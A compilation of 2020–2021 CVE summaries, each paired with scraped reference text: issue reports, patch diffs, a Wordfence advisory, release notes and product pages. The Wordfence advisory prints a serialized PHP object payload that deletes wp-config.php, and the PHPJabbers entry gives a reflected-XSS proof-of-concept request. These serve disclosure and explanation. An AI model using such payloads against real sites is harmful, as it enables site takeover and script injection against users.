An insecure unserialize vulnerability was discovered in ThinkAdmin versions 4.x through 6.x in app/admin/controller/api/Update.php and app/wechat/controller/api/Push.php, which may lead to arbitrary remote code execution.

Hi, this is Tencent **Xcheck** team. Our code safety check tool Xcheck has found several unserialize vulnerabilities in this project（v4, v5, v6）. It leads to remote code execution. Here are the details.

**v6**

1.  app/admin/controller/api/Update.php  
    line: 46 $this->rules = unserialize($this->request->post('rules', 'a:0:{}', ''));  
    line: 47 $this->ignore = unserialize($this->request->post('ignore', 'a:0:{}', ''));

**v6 v5 v4**  
2\. app/wechat/controller/api/Push.php  
line: 102 $this->receive = $this->toLower(unserialize($this->request->post('receive', '', null)));

Prevent from abusing of this vulnerability, we don't provide proof of concept. We hope to repair it as soon as possible.

**From Xcheck Team**

CVE-2020-23653: Remote code execution vulnerability · Issue #238 · zoujingli/ThinkAdmin

The Elementor Contact Form DB plugin before 1.6 for WordPress allows CSRF via backend admin pages.

CVE-2021-3133: Changeset 2454670 – WordPress Plugin Repository

** DISPUTED ** Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized.

**Commits on Sep 9, 2021**

**Commits on Jan 5, 2021**

1.  fix: do not unlink file if it is not a file
    
    Per https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3007 there is a possibility IF A USER HAS USED UNSERIALIZE() ON UNTRUSTED DATA of the stream response destructor potentially invoking a class \`\_\_toString()\` implementation, and thus triggering a vulnerability.
    
    This patch ensures that given that scenario, the stream response destructor does not use an object as a string for purposes of unlinking a potential stream filename.
    
    Signed-off-by: Matthew Weier O'Phinney <matthew@weierophinney.net>
    

**Commits on Dec 31, 2019**

**Commits on Dec 4, 2019**

**Commits on Oct 13, 2017**

**Commits on Mar 5, 2017**

**Commits on Nov 20, 2016**

**Commits on Jun 5, 2015**

**Commits on May 4, 2015**

**Commits on Apr 3, 2015**

**Commits on Jan 1, 2015**

**Commits on Apr 2, 2014**

**Commits on Jan 2, 2014**

**Commits on Mar 19, 2013**

**Commits on Jan 21, 2013**

**Commits on Jan 20, 2013**

**Commits on Jan 7, 2013**

**Commits on Jan 4, 2013**

**Commits on Jan 1, 2013**

**Commits on Aug 31, 2012**

CVE-2021-3007: History for src/Response/Stream.php - laminas/laminas-http

track_header in libavformat/vividas.c in FFmpeg 4.3.1 has an out-of-bounds write because of incorrect extradata packing.

@@ -28,6 +28,7 @@

\* @sa http://wiki.multimedia.cx/index.php?title=Vividas\_VIV

\*/

  

#include "libavutil/avassert.h"

#include "libavutil/intreadwrite.h"

#include "avio\_internal.h"

#include "avformat.h"

@@ -379,7 +380,7 @@ static int track\_header(VividasDemuxContext \*viv, AVFormatContext \*s, uint8\_t \*

  

if (avio\_tell(pb) < off) {

int num\_data;

int xd\_size = 0;

int xd\_size = 1;

int data\_len\[256\];

int offset = 1;

uint8\_t \*p;

@@ -393,10 +394,10 @@ static int track\_header(VividasDemuxContext \*viv, AVFormatContext \*s, uint8\_t \*

return AVERROR\_INVALIDDATA;

}

data\_len\[j\] = len;

xd\_size += len;

xd\_size += len + 1 + len/255;

}

  

ret = ff\_alloc\_extradata(st->codecpar, 64 + xd\_size + xd\_size / 255);

ret = ff\_alloc\_extradata(st->codecpar, xd\_size);

if (ret < 0)

return ret;

  

@@ -405,9 +406,7 @@ static int track\_header(VividasDemuxContext \*viv, AVFormatContext \*s, uint8\_t \*

  

for (j = 0; j < num\_data - 1; j++) {

unsigned delta = av\_xiphlacing(&p\[offset\], data\_len\[j\]);

if (delta > data\_len\[j\]) {

return AVERROR\_INVALIDDATA;

}

av\_assert0(delta <= xd\_size - offset);

offset += delta;

}

  

@@ -418,6 +417,7 @@ static int track\_header(VividasDemuxContext \*viv, AVFormatContext \*s, uint8\_t \*

av\_freep(&st->codecpar\->extradata);

break;

}

av\_assert0(data\_len\[j\] <= xd\_size - offset);

offset += data\_len\[j\];

}

CVE-2020-35964: avformat/vividas: improve extradata packing checks in track_header() · FFmpeg/FFmpeg@27a99e2

A Reflected Authenticated Cross-Site Scripting (XSS) vulnerability in the Newsletter plugin before 6.8.2 for WordPress allows remote attackers to trick a victim into submitting a tnpc_render AJAX request containing either JavaScript in an options parameter, or a base64-encoded JSON string containing JavaScript in the encoded_options parameter.

On July 13, 2020, our Threat Intelligence team was alerted to a recently patched vulnerability in Newsletter, a WordPress plugin with over 300,000 installations. While investigating this vulnerability, we discovered two additional, more serious vulnerabilities, including a reflected Cross-Site Scripting(XSS) vulnerability and a PHP Object Injection vulnerability.

We reached out to the plugin’s author on July 15, 2020, and received a response the next day. After fully disclosing the vulnerability on July 16, 2020, the plugin’s author released a patch the next day, on July 17, 2020.

A firewall rule to protect against the Reflected Cross-Site Scripting vulnerability was released to Wordfence Premium customers on July 15, 2020 and will become available to free Wordfence users 30 days later, on August 14, 2020.

Although the PHP Object Injection vulnerability would require additional vulnerable software to be installed, and our built-in PHP Object Injection protection would have protected against the most common exploits, we determined that a bypass was possible. Out of an abundance of caution, we created an additional firewall rule and released it to Wordfence Premium users on July 28, 2020. The PHP Object Injection firewall rule will become available to free Wordfence users on the same date as the XSS rule for this plugin, on August 14, 2020.

**Description**: Authenticated Reflected Cross-Site Scripting(XSS)  
**Affected Plugin**: Newsletter  
**Plugin Slug**: newsletter  
**Affected Versions**: < 6.8.2  
**CVE ID**: CVE-2020-35933  
**CVSS Score**: 6.5(Medium)  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L  
**Fully Patched Version**: 6.8.2

The Newsletter plugin includes a full-featured visual editor that can be used to create visually appealing newsletters and email campaigns. It uses an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. Unfortunately, the vulnerable versions did not filter these options, but passed them onto a second function, restore_options_from_request which used multiple methods to decode options that were passed in before displaying them using the render_block function.

    function tnpc\_render\_callback() {
        $block\_id = $\_POST\['b'\];
        $wrapper = isset($\_POST\['full'\]);
        $options = $this->restore\_options\_from\_request();

        $this->render\_block($block\_id, $wrapper, $options);
        wp\_die()

As such, it was possible for an attacker to get malicious JavaScript to display in multiple ways. The simplest method would involve sending a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html, and the options parameter set to arbitrary JavaScript. Alternatively, a similar request with the options parameter set to an empty array options[]= and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript would also result in JavaScript being rendered in a logged-in user’s browser.

            if (isset($\_POST\['encoded\_options'\])) {
                $decoded\_options = $this->options\_decode($\_POST\['encoded\_options'\]);

    function options\_decode($options) {

        // Start compatibility
        if (is\_string($options) && strpos($options, 'options\[') !== false) {
            $opts = array();
            parse\_str($options, $opts);
            $options = $opts\['options'\];
        }
        // End compatibility

        if (is\_array($options)) {
            return $options;
        }

        $tmp = json\_decode($options, true);
        if (is\_null($tmp)) {
            return json\_decode(base64\_decode($options), true);
        } else {
            return $tmp;
        }
    }

We discussed Reflected XSS vulnerabilities in a previous post. Despite the fact that they require an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users. If an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim’s browser.

**Description**: PHP Object Injection  
**Affected Plugin**: Newsletter  
**Plugin Slug**: newsletter  
**Affected Versions**: < 6.8.2  
**CVE ID**: CVE-2020-35932  
**CVSS Score**: 7.5(High)  
**CVSS Vector**: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H  
**Fully Patched Version**: 6.8.2

Although the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers. This introduced a PHP Object Injection vulnerability via the restore_options_from_request function. This function unserialized data passed in via the options[inline_edits] parameter. As such, an attacker logged-in as a subscriber could send a POST request to wp-admin/admin-ajax.php with the action parameter set to tpnc_render and the options[inline_edits] parameter set to a serialized PHP object.

        if (isset($\_POST\['options'\]) && is\_array($\_POST\['options'\])) {
            // Get all block options
            $options = stripslashes\_deep($\_POST\['options'\]);

            // Deserialize inline edits when
            // render is preformed on saving block options
            if (isset($options\['inline\_edits'\]) && is\_serialized($options\['inline\_edits'\])) {
                $options\['inline\_edits'\] = unserialize($options\['inline\_edits'\]);
            }

Although the Newsletter plugin itself did not use any code that would allow additional exploitation, this vulnerability could be used to inject a PHP object that might be processed by code from another plugin or theme and used to execute arbitrary code, upload files, or any number of other tactics that could lead to site takeover.

**How does PHP Object Injection Work?**

PHP can make use of a method called “serialization” to store complex data. In most cases serialized data consists of key => value arrays, for example:  
a:2:{s:11:"productName";s:5:"apple";s:7:"price";i:10;}  
This serialized data sample includes a productName property which is set to apple and a price property which is set to 10.

Serialized data is useful for storing settings in bulk, and many WordPress settings are stored as serialized data. Unfortunately, serialized data can also cause a security issue because it can be used to store PHP objects.

**What are PHP objects?**

Most modern PHP code is object oriented, meaning that code is organized into “classes.” These classes act like a basic template containing both variables (referred to as “properties”) and functions (referred to as “methods”). A running program can then create “objects” based on these templates, or classes. This creates not only a clear, concise structure for handling data, making code easier to maintain, it allows the same code to be reused for multiple similar tasks.

For instance, an online store could use a single class for products with properties(variables) including $price and $productName, and create a different object for each product. Each object would use the same function(method) to calculate tax, but could use a different price and product name.

If a plugin unserializes data provided by users without sanitizing that user’s input, then an attacker can send a specially crafted payload that would be unserialized into a PHP object.

On its own, an injected PHP object is not particularly dangerous. This changes, however, if the class it is based on uses so-called “magic methods”.

**What are magic methods?**

Magic methods are special functions that can be added to a class that describe what it should do when certain events happen.

For instance, the __destruct function is used in many classes to “clean up” once an object is done being used, and in many cases it does this by deleting files.

Here’s a very basic example of a vulnerable class that calculates product prices, stores a log, and deletes the log when it’s done:

class Product{

    public $price;
    public $productName;
    public $savedPriceFile;

    function \_\_construct($price, $productName){
        $this->price=$price;
        $this->productName=$productName;
        $this->savedPriceFile=$productName."pricefile.log";
    }

    function calculateTotal($quantity) {
        $total=$this->price \* $quantity;
        echo ($total);
        file\_put\_contents($this->savedPriceFile, $total);
    }

    function \_\_destruct(){
        unlink($this->savedPriceFile);
    }

}

If this code was running on a site that also had a PHP Object Injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site’s core configuration settings by sending a payload similar to the following:

O:7:"Product":3:{s:5:"price";i:2;s:11:"productName";s:6:"apples";s:14:"savedPriceFile";s:13:"wp-config.php";}

This would inject a Product object, with the $productName set to apples, the $price set to 2, and a $savedPriceFile property set to wp-config.php. Even though the object might not be used by anything else, eventually the __destruct function would run, deleting whatever $savedPriceFile was set to. In this case, the deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site’s new configuration to a remote database under their control.

Successfully exploiting this chain of events, also known as a “POP chain”, does require some degree of effort, since it requires:

*   Code that unserializes user input (an Object Injection vulnerability).
*   Code that uses a magic method in an insecure way.
*   Both of these need to be loaded at the same time.

Due to the fact that many plugins and themes load some, or all, of their classes on each request to the site, this is not as great of a restriction as it might appear. Additionally, although insecure usage of these “magic methods” is less common than it was in the past, such usage is not considered a vulnerability on its own since it requires the presence of a PHP Object Injection vulnerability to exploit.

Finally, although an attacker might need to know which plugins are installed in order to tailor their attack to a given POP chain, it is often fairly simple to determine this with scanning tools. The good news is that such vulnerabilities are difficult to automatically exploit in bulk, except in cases where a PHP Object Injection vulnerability and an insecure magic method are both used in the same plugin.

**Timeline**

**July 13, 2020** – Our Threat Intelligence Team begins investigating a recently patched vulnerability in the Newsletter plugin.  
**July 14, 2020** – During our investigation, we discover 2 unpatched vulnerabilities.  
**July 15, 2020** – We release a firewall rule for the reflected XSS vulnerability to Wordfence Premium users and reach out to the plugin’s author.  
**July 16, 2020** – We receive a response from the plugin’s author and provide full disclosure.  
**July 17, 2020** – Plugin author releases a patch for both vulnerabilities.  
**July 28, 2020** – We determine that an additional firewall rule is necessary to ensure full coverage for the PHP Object Injection vulnerability and release it to Wordfence Premium users.  
**August 14, 2020** – Both firewall rules become available to free Wordfence users.

**Conclusion**

In this blog post, we discussed 2 vulnerabilities in the Newsletter plugin, including a reflected XSS vulnerability and a PHP Object Injection vulnerability. We also explained what PHP Object Injection vulnerabilities are and how they can be exploited.

We strongly recommend updating to the latest version of the Newsletter plugin as soon as possible. As of this writing, that is version 6.8.3.

Wordfence Premium users have been protected against the majority of potential attacks since July 15, 2020, and have been fully protected since July 28, 2020. Sites still running the free version of Wordfence will receive firewall rules protecting against both vulnerabilities on August 14, 2020.

_Special thanks to Stefano Lissa & The Newsletter Team for their rapid response in patching these vulnerabilities._

CVE-2020-35933: Newsletter Plugin Vulnerabilities Affect Over 300,000 Sites

Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.

**For Creators**

Launch your next idea or project faster

**For Marketers**

Flexible cross-channel content distribution.

**For Developers**

Open source & built with an API-first approach

**Cockpit helps your Team**

Create. Connect. Deliver.

**Content Hub** **Multichannel** **Localization** **Roles & Permissions** **Revisions** **Open-Source** **Self-Hosted** **Image API**

• • •

**Batteries included**

Cockpit comes with a useful set of addons, ready to support you  
in your upcoming project

**Content**

Flexible structured content models

**Assets**

An assets manger you'll love to use

**Pages**

Routes, SEO and menus

**Sync**

Content migration made simple

**Webhooks**

Trigger custom actions & workflows

**Layouts**

Build component based layouts

Fits your favorite Tech Stack

CVE-2020-35846: Cockpit

The site-offline plugin before 1.4.4 for WordPress lacks certain wp_create_nonce and wp_verify_nonce calls, aka CSRF.

**wp\_create\_nonce( string|int $action = \-1 )**

Creates a cryptographic token tied to a specific action, user, user session, and window of time.

**Contents**

*   Parameters
*   Return
*   More Information
*   Source
*   Related
    *   Uses
    *   Used By
*   Changelog
*   User Contributed Notes

**Parameters**

$action

(string|int) (Optional) Scalar value to add context to the nonce.

Default value: -1

Top ↑

**Return**

(string) The token.

Top ↑

**More Information**

The function should be called using the init or any subsequent action hook. Calling it outside of an action hook can lead to problems, see the ticket #14024 for details.

Top ↑

**Source**

File: wp-includes/pluggable.php

	function wp\_create\_nonce( $action = -1 ) {
		$user = wp\_get\_current\_user();
		$uid  = (int) $user->ID;
		if ( ! $uid ) {
			/\*\* This filter is documented in wp-includes/pluggable.php \*/
			$uid = apply\_filters( 'nonce\_user\_logged\_out', $uid, $action );
		}

		$token = wp\_get\_session\_token();
		$i     = wp\_nonce\_tick();

		return substr( wp\_hash( $i . '|' . $action . '|' . $uid . '|' . $token, 'nonce' ), -12, 10 );
	}

Expand full source code Collapse full source code View on Trac View on GitHub

Top ↑

**Changelog**

Changelog

Version

Description

4.0.0

Session tokens were integrated with nonce creation

2.0.3

Introduced.

Top ↑

**User Contributed Notes**

CVE-2020-35773: wp_create_nonce() | Function | WordPress Developer Resources

The Online Marriage Registration System 1.0 post parameter "searchdata" in the user/search.php request is vulnerable to Time Based Sql Injection.

**Online Marriage Registration System using PHP and MySQL**

  

**Online Marriage Registration System Inroduction**

Online Marriage Registration SystemO is a web-based technology that will manage the records of the marriage and generate marriage certificate. It’s an easy for Admin to retrieve the data of marriage couple. Online Marriage Registration System is an automatic system which delivers data processing in very high speed in systematic manner.

**Project Requirements**

**Project Name**

Online Marriage Registration System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In the Online Marriage Registration System, we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Dashboard**:  In this section, the admin can briefly view the total number of the new applications, total verified applications, and total rejected applications.

**2\. Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search applications with the help of the user registration number

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Dashboard**: In this section, user can view the welcome page of the web application.

**2\. Registration Form**: In this section, user can fill the form of marriage registration.

**3\. View Marriage Application:** In this section, user can take print of verified certificates of marriage.

Users can also update his profile, change their password, and recover their password.

****Some of the Project Screens****

**User Signup**

**Home Page**

**Marriage Certificate  
  
**

****How to run the Online Marriage Registration Project using PHP and MySQL****

1.Download the zip file

2.Extract the file and copy omrs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/Html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name omrsdb

6.Import omrsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/omrs

User Credential  
Username: 1234567890  
Password: Test@123

Admin Credential  
Username: admin  
Password: Test@123

****View Demo****

Download Full Source Code (Online Marriage Registration System Project)

Size: 10 MB

Version: V 1.0

**Project Report Link**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-35151: Online Marriage Registration System in PHP | Online Marriage Registration Project

MediaWiki before 1.35.1 allows XSS via BlockLogFormatter.php. MediaWiki:blanknamespace potentially can be output as raw HTML with SCRIPT tags via LogFormatter::makePageLink(). This affects MediaWiki 1.33.0 and later.

I would like to announce the release of MediaWiki 1.31.11 and 1.35.1! These releases also serve as a maintenance release for these branches. Numerous fixes have been backported into 1.35, including some for PHP 8.0 support (though we are not declaring full PHP 8.0 support yet). T268894 doesn't apply to MediaWiki 1.31, as the code was added in 1.35. Also, only one of the two fixes of T268938 apply to MediaWiki 1.31, as the code was not added until MediaWiki 1.33. While tarballs have already been uploaded, git tags will follow later on today. An "MediaWiki Extensions Security Release Supplement" email will follow this one. == Security fixes == \* (T268894, CVE-2020-35474) SECURITY: Message recentchanges-legend-watchlistexpiry can contain raw html. \* (T268917, CVE-2020-35475) SECURITY: Messages userrights-expiry-current and userrights-expiry-none can contain raw html. \* (T268938, CVE-2020-35478, CVE-2020-35479) SECURITY: BlockLogFormatter can output raw html. \* (T205908, CVE-2020-35477) SECURITY: Unable to change visibility of log entries when MediaWiki:Mainpage uses Special:MyLanguage. \* (T120883, CVE-2020-35480) SECURITY: Divergent behavior for contributions and user pages of hidden users and missing users. == Links to all mentioned tasks == \* https://phabricator.wikimedia.org/T268894 \* https://phabricator.wikimedia.org/T268917 \* https://phabricator.wikimedia.org/T268938 \* https://phabricator.wikimedia.org/T205908 \* https://phabricator.wikimedia.org/T120883 == Release notes == Full release notes for 1.31.11: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1\_31/RELEASE-NOTES… https://www.mediawiki.org/wiki/Release\_notes/1.31 Full release notes for 1.35.1: https://phabricator.wikimedia.org/diffusion/MW/browse/REL1\_35/RELEASE-NOTES… https://www.mediawiki.org/wiki/Release\_notes/1.35 For information about how to upgrade, see <https://www.mediawiki.org/wiki/Manual:Upgrading> \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Download: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-core-1.31.11.tar.gz Patch to previous version (1.31.10): https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.31/mediawiki-core-1.31.11.tar.gz… https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.31/mediawiki-1.31.11.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Download: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.tar.gz Download without bundled extensions: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.1.tar.gz Patch to previous version (1.35.0): https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.patch.gz GPG signatures: https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.1.tar.gz.… https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.tar.gz.sig https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.1.patch.gz.sig Public keys: https://www.mediawiki.org/keys/keys.html

CVE-2020-35478: [MediaWiki-announce] Security and maintenance release: 1.31.11 / 1.35.1 - MediaWiki-announce

Multiple cross-site scripting (XSS) vulnerabilities exist in PHPJabbers Appointment Scheduler 2.3, in the index.php admin login webpage (with different request parameters), allows remote attackers to inject arbitrary web script or HTML.

    # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)# Date: 2020-12-14# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.phpjabbers.com# Software Link: https://www.phpjabbers.com/appointment-scheduler# Version: 2.3# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)# CVE: CVE-2020-35416Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.PoC Request:GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1Host: [removed]Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36X-Requested-With: XMLHttpRequestSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://[removed]Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422PoC Response:HTTP/1.1 200 OKServer: nginxDate: Thu, 14 Dec 2020 10:48:41 GMTContent-Type: text/html; charset=utf-8Connection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Origin, X-Requested-WithContent-Length: 13988<div class="container-fluid">   <div class="row">       <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">           <div class="panel panel-default pjAsContainer pjAsAside">               <div class="panel-heading p...[SNIP]...<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>...[SNIP]...PoC Screenshots:https://imgrz.com/item/naqZhttps://imgrz.com/item/ngZ1orhttps://imagebin.ca/v/5kkKgOdFS9n5https://imagebin.ca/v/5kkKlhi4amhj

Tag

#php